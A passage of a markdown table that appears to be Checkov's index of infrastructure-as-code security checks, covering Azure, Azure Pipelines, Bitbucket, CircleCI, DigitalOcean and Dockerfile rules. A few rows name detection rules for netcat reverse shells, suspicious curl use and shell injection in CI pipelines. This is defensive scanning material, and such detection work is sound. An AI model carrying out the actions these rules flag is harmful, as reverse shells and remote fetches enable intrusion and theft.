is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 2029 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 2030 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | -| 2031 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | -| 2032 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 2033 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | -| 2034 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | -| 2035 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | -| 2036 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 2037 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | -| 2038 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 2039 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | -| 2040 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | -| 2041 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 2042 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | -| 2043 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 2044 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | -| 2045 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | -| 2046 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2047 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2048 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | -| 2049 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2050 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2051 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | -| 2052 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 2053 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | -| 2054 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | -| 2055 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | -| 2056 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | -| 2057 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | -| 2058 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | -| 2059 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | -| 2060 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | -| 2061 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | -| 2062 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | -| 2063 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | -| 2064 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | -| 2065 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | -| 2066 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | -| 2067 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | -| 2068 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | -| 2069 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | -| 2070 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | -| 2071 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | -| 2072 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | -| 2073 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2074 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2075 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2076 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | -| 2077 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | -| 2078 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | -| 2079 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | -| 2080 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | -| 2081 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | -| 2082 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | -| 2083 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 2084 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | -| 2085 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | -| 2086 | CKV_AZUREPIPELINES_1 | azure_pipelines | jobs | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | -| 2087 | CKV_AZUREPIPELINES_1 | azure_pipelines | stages[].jobs[] | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) | -| 2088 | CKV_AZUREPIPELINES_2 | azure_pipelines | jobs | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | -| 2089 | CKV_AZUREPIPELINES_2 | azure_pipelines | stages[].jobs[] | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) | -| 2090 | CKV_AZUREPIPELINES_3 | azure_pipelines | jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | -| 2091 | CKV_AZUREPIPELINES_3 | azure_pipelines | stages[].jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | -| 2092 | CKV_AZUREPIPELINES_5 | azure_pipelines | *.container[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2093 | CKV_AZUREPIPELINES_5 | azure_pipelines | jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2094 | CKV_AZUREPIPELINES_5 | azure_pipelines | stages[].jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2095 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | -| 2096 | CKV_BITBUCKET_1 | bitbucket_configuration | * | Merge requests should require at least 2 approvals | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py) | -| 2097 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | [{image:image,__startline__:__startline__,__endline__:__endline__}] | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2098 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2099 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2100 | CKV_CIRCLECIPIPELINES_1 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | circleci_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py) | -| 2101 | CKV_CIRCLECIPIPELINES_2 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image version is referenced via hash not arbitrary tag. | circleci_pipelines | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py) | -| 2102 | CKV_CIRCLECIPIPELINES_3 | circleci_pipelines | orbs.{orbs: @} | Ensure mutable development orbs are not used. | circleci_pipelines | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py) | -| 2103 | CKV_CIRCLECIPIPELINES_4 | circleci_pipelines | orbs.{orbs: @} | Ensure unversioned volatile orbs are not used. | circleci_pipelines | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py) | -| 2104 | CKV_CIRCLECIPIPELINES_5 | circleci_pipelines | jobs.*.steps[] | Suspicious use of netcat with IP address | circleci_pipelines | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py) | -| 2105 | CKV_CIRCLECIPIPELINES_6 | circleci_pipelines | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | circleci_pipelines | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py) | -| 2106 | CKV_CIRCLECIPIPELINES_7 | circleci_pipelines | jobs.*.steps[] | Suspicious use of curl in run task | circleci_pipelines | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py) | -| 2107 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | -| 2108 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | -| 2109 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | -| 2110 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | -| 2111 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | -| 2112 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | -| 2113 | CKV_DOCKER_1 | dockerfile | EXPOSE | Ensure port 22 is not exposed | dockerfile | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py) | -| 2114 | CKV_DOCKER_2 | dockerfile | * | Ensure that HEALTHCHECK instructions have been added to container images | dockerfile | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py) | -| 2115 | CKV_DOCKER_3 | dockerfile | * | Ensure that a user for the container has been created | dockerfile | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py) | -| 2116 | CKV_DOCKER_4 | dockerfile | ADD | Ensure that COPY is used instead of ADD in Dockerfiles | dockerfile | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py) | -| 2117 | CKV_DOCKER_5 | dockerfile | RUN | Ensure update instructions are not use alone in the Dockerfile | dockerfile | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py) | -| 2118 | CKV_DOCKER_6 | dockerfile | MAINTAINER | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated) | dockerfile | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py) | -| 2119 | CKV_DOCKER_7 | dockerfile | FROM | Ensure the base image uses a non latest version tag | dockerfile | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py) | -| 2120 | CKV_DOCKER_8 | dockerfile | USER | Ensure the last USER is not root | dockerfile | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py) | -| 2121 | CKV_DOCKER_9 | dockerfile | RUN | Ensure that APT isn't used | dockerfile | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py) | -| 2122 | CKV_DOCKER_10 | dockerfile | WORKDIR | Ensure that WORKDIR values are absolute paths | dockerfile | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py) | -| 2123 | CKV_DOCKER_11 | dockerfile | FROM | Ensure From Alias are unique for multistage builds. | dockerfile | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py) | -| 2124 | CKV2_DOCKER_1 | resource | RUN | Ensure that sudo isn't used | dockerfile | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml) | -| 2125 | CKV2_DOCKER_2 | resource | RUN | Ensure that certificate validation isn't disabled with curl | dockerfile | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml) | -| 2126 | CKV2_DOCKER_3 | resource | RUN | Ensure that certificate validation isn't disabled with wget | dockerfile | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml) | -| 2127 | CKV2_DOCKER_4 | resource | RUN | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option | dockerfile | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml) | -| 2128 | CKV2_DOCKER_5 | resource | ARG | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | -| 2129 | CKV2_DOCKER_5 | resource | ENV | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | -| 2130 | 